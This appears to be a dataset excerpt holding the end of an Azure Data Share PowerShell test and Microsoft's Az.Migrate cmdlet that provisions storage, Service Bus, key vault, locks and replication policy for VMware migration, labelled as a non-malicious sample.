-ResourceGroupName $resourceGroup -AccountName $AccountName -ShareName $ShareName Assert-NotNull $listSync Assert-AreEqual $listSync[0].status "Succeeded" Assert-AreEqual $listSync[1].status "InProgress" Assert-AreEqual $listSync[2].status "Failed" } function Test-ListShareSynchronizationDetailsCrud { $resourceGroup = getAssetName $AccountName = getAssetName $ShareName = getAssetName $SynchronizationId = "02a17faa-4498-45ee-a884-162180af9251" $listSyncDetails = Get-AzDataShareSynchronizationDetail -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareName $ShareName -SynchronizationId $SynchronizationId Assert-NotNull $listSyncDetails Assert-AreEqual $listSyncDetails[0].status "Succeeded" Assert-AreEqual $listSyncDetails[1].status "InProgress" Assert-AreEqual $listSyncDetails[2].status "Failed" }
combined_dataset/train/non-malicious/sample_59_92.ps1
sample_59_92.ps1
# ---------------------------------------------------------------------------------- # # Copyright Microsoft Corporation # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------------- <# .Synopsis Initialises the infrastructure for the migrate project. .Description The Initialize-AzMigrateReplicationInfrastructure cmdlet initialises the infrastructure for the migrate project. .Link https://learn.microsoft.com/powershell/module/az.migrate/initialize-azmigratereplicationinfrastructure #> function Initialize-AzMigrateReplicationInfrastructure { [OutputType([System.Boolean])] [CmdletBinding(DefaultParameterSetName = 'agentlessVMware', PositionalBinding = $false, SupportsShouldProcess, ConfirmImpact = 'Medium')] param( [Parameter(Mandatory)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Path')] [System.String] # Specifies the Resource Group of the Azure Migrate Project in the current subscription. ${ResourceGroupName}, [Parameter(Mandatory)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Path')] [System.String] # Specifies the name of the Azure Migrate project to be used for server migration. ${ProjectName}, [Parameter(Mandatory)] [ValidateSet("agentlessVMware")] [ArgumentCompleter( { "agentlessVMware" })] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Path')] [System.String] # Specifies the server migration scenario for which the replication infrastructure needs to be initialized. ${Scenario}, [Parameter(Mandatory)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Path')] [System.String] # Specifies the target Azure region for server migrations. ${TargetRegion}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Path')] [System.String] # Specifies the Storage Account Id to be used for private endpoint scenario. ${CacheStorageAccountId}, [Parameter()] [System.String] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Runtime.DefaultInfo(Script = '(Get-AzContext).Subscription.Id')] # Azure Subscription ID. ${SubscriptionId}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { Import-Module Az.Resources Import-Module Az.KeyVault Import-Module Az.Storage Import-Module Az.ServiceBus # Validate user specified target region $TargetRegion = $TargetRegion.ToLower() $allAvailableAzureLocations = Get-AzLocation $matchingLocationByLocationName = $allAvailableAzureLocations | Where-Object { $_.Location -eq $TargetRegion } $matchingLocationByDisplayName = $allAvailableAzureLocations | Where-Object { $_.DisplayName -eq $TargetRegion } if ($matchingLocationByLocationName) { $TargetRegion = $matchingLocationByLocationName.Location } elseif ($matchingLocationByDisplayName) { $TargetRegion = $matchingLocationByDisplayName.Location } elseif ($TargetRegion -match "euap") { } else { throw "Creation of resources required for replication failed due to invalid location. Run Get-AzLocation to verify the validity of the location and retry this step." } # Get/Set SubscriptionId if (($null -eq $SubscriptionId) -or ($SubscriptionId -eq "")) { $context = Get-AzContext $SubscriptionId = $context.Subscription.Id if (($null -eq $SubscriptionId) -or ($SubscriptionId -eq "")) { throw "Please login to Azure to select a subscription." } } else { Select-AzSubscription -SubscriptionId $SubscriptionId } $context = Get-AzContext Write-Host "Using Subscription Id: ", $SubscriptionId Write-Host "Selected Target Region: ", $TargetRegion $rg = Get-AzResourceGroup -Name $ResourceGroupName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$rg) { Write-Host "Creating Resource Group ", $ResourceGroupName $output = New-AzResourceGroup -Name $ResourceGroupName -Location $TargetRegion Write-Host $ResourceGroupName, " created." } Write-Host "Selected resource group : ", $ResourceGroupName $LogStringCreated = "Created : " $LogStringSkipping = " already exists." $userObject = Get-AzADUser -UserPrincipalName $context.Subscription.ExtendedProperties.Account if (-not $userObject) { $userObject = Get-AzADUser -Mail $context.Subscription.ExtendedProperties.Account } if (-not $userObject) { $mailNickname = "{0}#EXT#" -f $($context.Account.Id -replace '@', '_') $userObject = Get-AzADUser | Where-Object { $_.MailNickname -eq $mailNickname } } if (-not $userObject) { $userObject = Get-AzADServicePrincipal -ApplicationID $context.Account.Id } if (-not $userObject) { throw 'User Object Id Not Found!' } # Hash code source code $Source = @" using System; public class HashFunctions { public static int hashForArtifact(String artifact) { int hash = 0; int al = artifact.Length; int tl = 0; char[] ac = artifact.ToCharArray(); while (tl < al) { hash = ((hash << 5) - hash) + ac[tl++] | 0; } return Math.Abs(hash); } } "@ #Get vault name from SMS solution. $smsSolution = Get-AzMigrateSolution -MigrateProjectName $ProjectName -ResourceGroupName $ResourceGroupName -Name "Servers-Migration-ServerMigration" if (-not $smsSolution.DetailExtendedDetail.AdditionalProperties.vaultId) { throw 'Azure Migrate appliance not configured. Setup Azure Migrate appliance before proceeding.' } $VaultName = $smsSolution.DetailExtendedDetail.AdditionalProperties.vaultId.Split("/")[8] # Get all appliances and sites in the project from SDS solution. $sdsSolution = Get-AzMigrateSolution -MigrateProjectName $ProjectName -ResourceGroupName $ResourceGroupName -Name "Servers-Discovery-ServerDiscovery" $appMap = @{} if ($null -ne $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV2"]) { $appMapV2 = $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV2"] | ConvertFrom-Json # Fetch all appliance from V2 map first. Then these can be updated if found again in V3 map. foreach ($item in $appMapV2) { $appMap[$item.ApplianceName] = $item.SiteId } } if ($null -ne $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV3"]) { $appMapV3 = $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV3"] | ConvertFrom-Json foreach ($item in $appMapV3) { $t = $item.psobject.properties $appMap[$t.Name] = $t.Value.SiteId } } if ($null -eq $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV2"] -And $null -eq $sdsSolution.DetailExtendedDetail["applianceNameToSiteIdMapV3"] ) { throw "Server Discovery Solution missing Appliance Details. Invalid Solution." } foreach ($eachApp in $appMap.GetEnumerator()) { $SiteName = $eachApp.Value.Split("/")[8] $applianceName = $eachApp.Key $HashCodeInput = $SiteName + $TargetRegion # User cannot change location if it's already set in mapping. $mappingName = "containermapping" $allFabrics = Get-AzMigrateReplicationFabric -ResourceGroupName $ResourceGroupName -ResourceName $VaultName foreach ($fabric in $allFabrics) { if (($fabric.Property.CustomDetail.InstanceType -ceq "VMwareV2") -and ($fabric.Property.CustomDetail.VmwareSiteId.Split("/")[8] -ceq $SiteName)) { $peContainers = Get-AzMigrateReplicationProtectionContainer -FabricName $fabric.Name -ResourceGroupName $ResourceGroupName -ResourceName $VaultName $peContainer = $peContainers[0] $existingMapping = Get-AzMigrateReplicationProtectionContainerMapping -ResourceGroupName $ResourceGroupName -ResourceName $VaultName -FabricName $fabric.Name -ProtectionContainerName $peContainer.Name -MappingName $mappingName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (($existingMapping) -and ($existingMapping.ProviderSpecificDetail.TargetLocation -ne $TargetRegion)) { $targetRegionMismatchExceptionMsg = $ProjectName + " is already configured for migrating servers to " + $TargetRegion + ". Target Region cannot be modified once configured." throw $targetRegionMismatchExceptionMsg } } } $job = Start-Job -ScriptBlock { Add-Type -TypeDefinition $args[0] -Language CSharp $hash = [HashFunctions]::hashForArtifact($args[1]) $hash } -ArgumentList $Source, $HashCodeInput Wait-Job $job $hash = Receive-Job $job Write-Host "Initiating Artifact Creation for Appliance: ", $applianceName $MigratePrefix = "migrate" if ([string]::IsNullOrEmpty($CacheStorageAccountId)) { # Phase 1 # Storage account $LogStorageAcName = $MigratePrefix + "lsa" + $hash $GateWayStorageAcName = $MigratePrefix + "gwsa" + $hash $StorageType = "Microsoft.Storage/storageAccounts" $StorageApiVersion = "2017-10-01" $LogStorageProperties = @{ encryption = @{ services = @{ blob = @{enabled = $true }; file = @{enabled = $true }; table = @{enabled = $true }; queue = @{enabled = $true } }; keySource = "Microsoft.Storage" }; supportsHttpsTrafficOnly = $true } $ResourceTag = @{"Migrate Project" = $ProjectName } $StorageSku = @{name = "Standard_LRS" } $ResourceKind = "Storage" $lsaStorageAccount = Get-AzResource -ResourceGroupName $ResourceGroupName -Name $LogStorageAcName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$lsaStorageAccount) { $output = New-AzResource -ResourceGroupName $ResourceGroupName -Location $TargetRegion -Properties $LogStorageProperties -ResourceName $LogStorageAcName -ResourceType $StorageType -ApiVersion $StorageApiVersion -Kind $ResourceKind -Sku $StorageSku -Tag $ResourceTag -Force Write-Host $LogStringCreated, $LogStorageAcName } else { Write-Host $LogStorageAcName, $LogStringSkipping } $gwyStorageAccount = Get-AzResource -ResourceGroupName $ResourceGroupName -Name $GateWayStorageAcName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$gwyStorageAccount) { $output = New-AzResource -ResourceGroupName $ResourceGroupName -Location $TargetRegion -Properties $LogStorageProperties -ResourceName $GateWayStorageAcName -ResourceType $StorageType -ApiVersion $StorageApiVersion -Kind $ResourceKind -Sku $StorageSku -Tag $ResourceTag -Force Write-Host $LogStringCreated, $GateWayStorageAcName } else { Write-Host $GateWayStorageAcName, $LogStringSkipping } # Service bus namespace $ServiceBusNamespace = $MigratePrefix + "sbns" + $hash $ServiceBusType = "Microsoft.ServiceBus/namespaces" $ServiceBusApiVersion = "2017-04-01" $ServiceBusSku = @{ name = "Standard"; tier = "Standard" } $ServiceBusProperties = @{} $ServieBusKind = "ServiceBusNameSpace" $serviceBusAccount = Get-AzResource -ResourceGroupName $ResourceGroupName -Name $ServiceBusNamespace -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$serviceBusAccount) { $output = New-AzResource -ResourceGroupName $ResourceGroupName -Location $TargetRegion -Properties $ServiceBusProperties -ResourceName $ServiceBusNamespace -ResourceType $ServiceBusType -ApiVersion $ServiceBusApiVersion -Kind $ServieBusKind -Sku $ServiceBusSku -Tag $ResourceTag -Force Write-Host $LogStringCreated, $ServiceBusNamespace } else { Write-Host $ServiceBusNamespace, $LogStringSkipping } # Key vault $KeyVaultName = $MigratePrefix + "kv" + $hash $KeyVaultType = "Microsoft.KeyVault/vaults" $KeyVaultApiVersion = "2016-10-01" $KeyVaultKind = "KeyVault" $existingKeyVaultAccount = Get-AzResource -ResourceGroupName $ResourceGroupName -Name $KeyVaultName -ErrorVariable notPresent -ErrorAction SilentlyContinue if ($existingKeyVaultAccount) { Write-Host $KeyVaultName, $LogStringSkipping } else { $tenantID = $context.Tenant.TenantId $KeyVaultPermissions = @{ keys = @("Get", "List", "Create", "Update", "Delete"); secrets = @("Get", "Set", "List", "Delete"); certificates = @("Get", "List"); storage = @("get", "list", "delete", "set", "update", "regeneratekey", "getsas", "listsas", "deletesas", "setsas", "recover", "backup", "restore", "purge") } $CloudEnvironMent = $context.Environment.Name $HyperVManagerAppId = "b8340c3b-9267-498f-b21a-15d5547fd85e" if ($CloudEnvironMent -eq "AzureUSGovernment") { $HyperVManagerAppId = "AFAE2AF7-62E0-4AA4-8F66-B11F74F56326" } $hyperVManagerObject = Get-AzADServicePrincipal -ApplicationID $HyperVManagerAppId $accessPolicies = @() $userAccessPolicy = @{ "tenantId" = $tenantID; "objectId" = $userObject.Id; "permissions" = $KeyVaultPermissions } $hyperVAccessPolicy = @{ "tenantId" = $tenantID; "objectId" = $hyperVManagerObject.Id; "permissions" = $KeyVaultPermissions } $accessPolicies += $userAccessPolicy $accessPolicies += $hyperVAccessPolicy $allFabrics = Get-AzMigrateReplicationFabric -ResourceGroupName $ResourceGroupName -ResourceName $VaultName $selectedFabricName = "" foreach ($fabric in $allFabrics) { if (($fabric.Property.CustomDetail.InstanceType -ceq "VMwareV2") -and ($fabric.Property.CustomDetail.VmwareSiteId.Split("/")[8] -ceq $SiteName)) { $projectRSPObject = Get-AzMigrateReplicationRecoveryServicesProvider -ResourceGroupName $ResourceGroupName -ResourceName $VaultName foreach ($projectRSP in $projectRSPObject) { $projectRSPFabricName = $projectRSP.Id.Split("/")[10] if (($projectRSP.FabricType -eq "VMwareV2") -and ($fabric.Name -eq $projectRSPFabricName)) { $projectAccessPolicy = @{ "tenantId" = $tenantID; "objectId" = $projectRSP.ResourceAccessIdentityDetailObjectId; "permissions" = $KeyVaultPermissions } $accessPolicies += $projectAccessPolicy } } } } $keyVaultProperties = @{ sku = @{ family = "A"; name = "standard" }; tenantId = $tenantID; enabledForDeployment = $true; enabledForDiskEncryption = $false; enabledForTemplateDeployment = $true; enableSoftDelete = $true; accessPolicies = $accessPolicies } $output = New-AzResource -ResourceGroupName $ResourceGroupName -Location $TargetRegion -Properties $keyVaultProperties -ResourceName $KeyVaultName -ResourceType $KeyVaultType -ApiVersion $KeyVaultApiVersion -Kind $KeyVaultKind -Tag $ResourceTag -Force Write-Host $LogStringCreated, $KeyVaultName } # Locks $CommonLockName = $ProjectName + "lock" $lockNotes = "This is in use by Azure Migrate project" $lsaLock = Get-AzResourceLock -LockName $CommonLockName -ResourceName $LogStorageAcName -ResourceType $StorageType -ResourceGroupName $ResourceGroupName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$lsaLock) { $output = New-AzResourceLock -LockLevel CanNotDelete -LockName $CommonLockName -ResourceName $LogStorageAcName -ResourceType $StorageType -ResourceGroupName $ResourceGroupName -LockNotes $lockNotes -Force Write-Host $LogStringCreated, $CommonLockName, " for ", $LogStorageAcName } else { Write-Host $CommonLockName, " for ", $LogStorageAcName, $LogStringSkipping } $gwyLock = Get-AzResourceLock -LockName $CommonLockName -ResourceName $GateWayStorageAcName -ResourceType $StorageType -ResourceGroupName $ResourceGroupName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$gwyLock) { $output = New-AzResourceLock -LockLevel CanNotDelete -LockName $CommonLockName -ResourceName $GateWayStorageAcName -ResourceType $StorageType -ResourceGroupName $ResourceGroupName -LockNotes $lockNotes -Force Write-Host $LogStringCreated, $CommonLockName, " for ", $GateWayStorageAcName } else { Write-Host $CommonLockName, " for ", $LogStorageAcName, $LogStringSkipping } $sbsnsLock = Get-AzResourceLock -LockName $CommonLockName -ResourceName $ServiceBusNamespace -ResourceType $ServiceBusType -ResourceGroupName $ResourceGroupName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$sbsnsLock) { $output = New-AzResourceLock -LockLevel CanNotDelete -LockName $CommonLockName -ResourceName $ServiceBusNamespace -ResourceType $ServiceBusType -ResourceGroupName $ResourceGroupName -LockNotes $lockNotes -Force Write-Host $LogStringCreated, $CommonLockName, " for ", $ServiceBusNamespace } else { Write-Host $CommonLockName, " for ", $ServiceBusNamespace, $LogStringSkipping } $kvLock = Get-AzResourceLock -LockName $CommonLockName -ResourceName $KeyVaultName -ResourceType $KeyVaultType -ResourceGroupName $ResourceGroupName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$kvLock) { $output = New-AzResourceLock -LockLevel CanNotDelete -LockName $CommonLockName -ResourceName $KeyVaultName -ResourceType $KeyVaultType -ResourceGroupName $ResourceGroupName -LockNotes $lockNotes -Force Write-Host $LogStringCreated, $CommonLockName, " for ", $KeyVaultName } else { Write-Host $CommonLockName, " for ", $KeyVaultName, $LogStringSkipping } # Intermediate phase # RoleAssignments $roleDefinitionId = "81a9662b-bebf-436f-a333-f67b29880f12" $kvspnid = Get-AzADServicePrincipal -DisplayName "Azure Key Vault" $Id = "" if($kvspnid -ne $null){ $type = $kvspnid.GetType().BaseType Write-Host $type.Name if ($type.Name -eq "Array"){ $Id = $kvspnid[0].Id } else{ $Id = $kvspnid.Id } } else{ Write-Host "Unable to retrieve KV SPN Id" } Write-Host $Id $kvspnid = $Id $gwyStorageAccount = Get-AzResource -ResourceName $GateWayStorageAcName -ResourceGroupName $ResourceGroupName $lsaStorageAccount = Get-AzResource -ResourceName $LogStorageAcName -ResourceGroupName $ResourceGroupName $gwyRoleAssignments = Get-AzRoleAssignment -ObjectId $kvspnid -Scope $gwyStorageAccount.Id -ErrorVariable notPresent -ErrorAction SilentlyContinue $lsaRoleAssignments = Get-AzRoleAssignment -ObjectId $kvspnid -Scope $lsaStorageAccount.Id -ErrorVariable notPresent -ErrorAction SilentlyContinue if (-not $lsaRoleAssignments) { $output = New-AzRoleAssignment -ObjectId $kvspnid -Scope $lsaStorageAccount.Id -RoleDefinitionId $roleDefinitionId } if (-not $gwyRoleAssignments) { $output = New-AzRoleAssignment -ObjectId $kvspnid -Scope $gwyStorageAccount.Id -RoleDefinitionId $roleDefinitionId } if (-not $lsaRoleAssignments -or -not $gwyRoleAssignments) { for ($i = 1; $i -le 18; $i++) { Write-Information "Waiting for Role Assignments to be available... $( $i * 10 ) seconds" -InformationAction Continue Start-Sleep -Seconds 10 $gwyRoleAssignments = Get-AzRoleAssignment -ObjectId $kvspnid -Scope $gwyStorageAccount.Id -ErrorVariable notPresent -ErrorAction SilentlyContinue $lsaRoleAssignments = Get-AzRoleAssignment -ObjectId $kvspnid -Scope $lsaStorageAccount.Id -ErrorVariable notPresent -ErrorAction SilentlyContinue if ($gwyRoleAssignments -and $lsaRoleAssignments) { break } } } # SA. SAS definition $gatewayStorageAccountSasSecretName = "gwySas" $cacheStorageAccountSasSecretName = "cacheSas" $regenerationPeriod = [System.Timespan]::FromDays(30) $keyName = 'Key2' Add-AzKeyVaultManagedStorageAccount -VaultName $KeyVaultName -AccountName $LogStorageAcName -AccountResourceId $lsaStorageAccount.Id -ActiveKeyName $keyName -RegenerationPeriod $regenerationPeriod Add-AzKeyVaultManagedStorageAccount -VaultName $KeyVaultName -AccountName $GateWayStorageAcName -AccountResourceId $gwyStorageAccount.Id -ActiveKeyName $keyName -RegenerationPeriod $regenerationPeriod $lsasctx = New-AzStorageContext -StorageAccountName $LogStorageAcName -Protocol Https -StorageAccountKey $keyName $gwysctx = New-AzStorageContext -StorageAccountName $GateWayStorageAcName -Protocol Https -StorageAccountKey $keyName $lsaat = New-AzStorageAccountSasToken -Service blob, file, Table, Queue -ResourceType Service, Container, Object -Permission "racwdlup" -Protocol HttpsOnly -Context $lsasctx $gwyat = New-AzStorageAccountSasToken -Service blob, file, Table, Queue -ResourceType Service, Container, Object -Permission "racwdlup" -Protocol HttpsOnly -Context $gwysctx Set-AzKeyVaultManagedStorageSasDefinition -AccountName $LogStorageAcName -VaultName $KeyVaultName -Name $cacheStorageAccountSasSecretName -TemplateUri $lsaat -SasType 'account' -ValidityPeriod ([System.Timespan]::FromDays(30)) Set-AzKeyVaultManagedStorageSasDefinition -AccountName $GateWayStorageAcName -VaultName $KeyVaultName -Name $gatewayStorageAccountSasSecretName -TemplateUri $gwyat -SasType 'account' -ValidityPeriod ([System.Timespan]::FromDays(30)) # Phase 2 # ServiceBusConnectionString $serviceBusConnString = "ServiceBusConnectionString" $serviceBusSecretObject = Get-AzKeyVaultSecret -VaultName $KeyVaultName -Name $serviceBusConnString -ErrorVariable notPresent -ErrorAction SilentlyContinue if ($serviceBusSecretObject) { Write-Host $serviceBusConnString, " for ", $applianceName, $LogStringSkipping } else { $serviceBusRootKey = Get-AzServiceBusKey -ResourceGroupName $ResourceGroupName -Namespace $ServiceBusNamespace -Name "RootManageSharedAccessKey" $secret = ConvertTo-SecureString -String $serviceBusRootKey.PrimaryConnectionString -AsPlainText -Force $output = Set-AzKeyVaultSecret -VaultName $KeyVaultName -Name $serviceBusConnString -SecretValue $secret Write-Host $LogStringCreated, $serviceBusConnString, " for ", $applianceName } } else { $response = Get-AzResource -ResourceId $CacheStorageAccountId -ErrorVariable notPresent -ErrorAction SilentlyContinue if ($response -eq $null) { throw "Storage account '$($CacheStorageAccountId)' does not exist." } Import-Module Az.Network $res = Get-AzPrivateEndpointConnection -privatelinkresourceid $CacheStorageAccountId -ErrorVariable notPresent -ErrorAction SilentlyContinue if (($res -eq $null) -or ($res.PrivateEndpoint -eq $null) -or ($res.PrivateEndpoint.Count -eq 0)) { throw "Storage account '$($CacheStorageAccountId)' is not private endpoint enabled." } } # Policy $policyName = $MigratePrefix + $SiteName + "policy" $existingPolicyObject = Get-AzMigrateReplicationPolicy -PolicyName $policyName -ResourceGroupName $ResourceGroupName -ResourceName $VaultName -ErrorVariable notPresent -ErrorAction SilentlyContinue if (!$existingPolicyObject) { $providerSpecificPolicy = [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Models.Api202301.VMwareCbtPolicyCreationInput]::new() $providerSpecificPolicy.AppConsistentFrequencyInMinute = 240 $providerSpecificPolicy.InstanceType = "VMwareCbt" $providerSpecificPolicy.RecoveryPointHistoryInMinute = 360 $providerSpecificPolicy.CrashConsistentFrequencyInMinute = 60 $existingPolicyObject = New-AzMigrateReplicationPolicy -PolicyName $policyName -ResourceGroupName $ResourceGroupName -ResourceName $VaultName -ProviderSpecificInput $providerSpecificPolicy Write-Host $LogStringCreated, $policyName } else { Write-Host $policyName, $LogStringSkipping } # Policy-container mapping $mappingName = "containermapping" $allFabrics = Get-AzMigrateReplicationFabric -ResourceGroupName $ResourceGroupName -ResourceName $VaultName foreach ($fabric in $allFabrics) { if (($fabric.Property.CustomDetail.InstanceType -ceq "VMwareV2") -and ($fabric.Property.CustomDetail.VmwareSiteId.Split("/")[8] -ceq $SiteName)) { $peContainers = Get-AzMigrateReplicationProtectionContainer -FabricName $fabric.Name -ResourceGroupName $ResourceGroupName -ResourceName $VaultName $peContainer = $peContainers[0] $existingMapping = Get-AzMigrateReplicationProtectionContainerMapping -ResourceGroupName $ResourceGroupName -ResourceName $VaultName -FabricName $fabric.Name -ProtectionContainerName $peContainer.Name -MappingName $mappingName -ErrorVariable notPresent -ErrorAction SilentlyContinue if ($existingMapping) { Write-Host $mappingName, " for ", $applianceName, $LogStringSkipping } else { $providerSpecificInput = [Microsoft.Azure.PowerShell.Cmdlets.Migrate.Models.Api202301.VMwareCbtContainerMappingInput]::new() $providerSpecificInput.InstanceType = "VMwareCbt" $providerSpecificInput.TargetLocation = $TargetRegion if ([string]::IsNullOrEmpty($CacheStorageAccountId)) { $keyVaultAccountDetails = Get-AzKeyVault -ResourceGroupName $ResourceGroupName -Name $KeyVaultName $gwyStorageAccount = Get-AzResource -ResourceGroupName $ResourceGroupName -ResourceName $GateWayStorageAcName $providerSpecificInput.KeyVaultId = $keyVaultAccountDetails.ResourceId $providerSpecificInput.KeyVaultUri = $keyVaultAccountDetails.VaultUri $providerSpecificInput.ServiceBusConnectionStringSecretName = $serviceBusConnString $providerSpecificInput.StorageAccountId = $gwyStorageAccount.Id $providerSpecificInput.StorageAccountSasSecretName = $GateWayStorageAcName + "-gwySas" } else { $providerSpecificInput.StorageAccountId = $CacheStorageAccountId } $output = New-AzMigrateReplicationProtectionContainerMapping -FabricName $fabric.Name -MappingName $mappingName -ProtectionContainerName $peContainer.Name -ResourceGroupName $ResourceGroupName -ResourceName $VaultName -PolicyId $existingPolicyObject.Id -ProviderSpecificInput $providerSpecificInput -TargetProtectionContainerId "Microsoft Azure" Write-Host $LogStringCreated, $mappingName, " for ", $applianceName } } } } Write-Host "Finished successfully." return $true } } # SIG # Begin signature block # MIIn0AYJKoZIhvcNAQcCoIInwTCCJ70CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAe6zh2A2ueh2D8 # Yz6XjX/hIYs9fs4E9Is6BlRsA4yyzaCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # 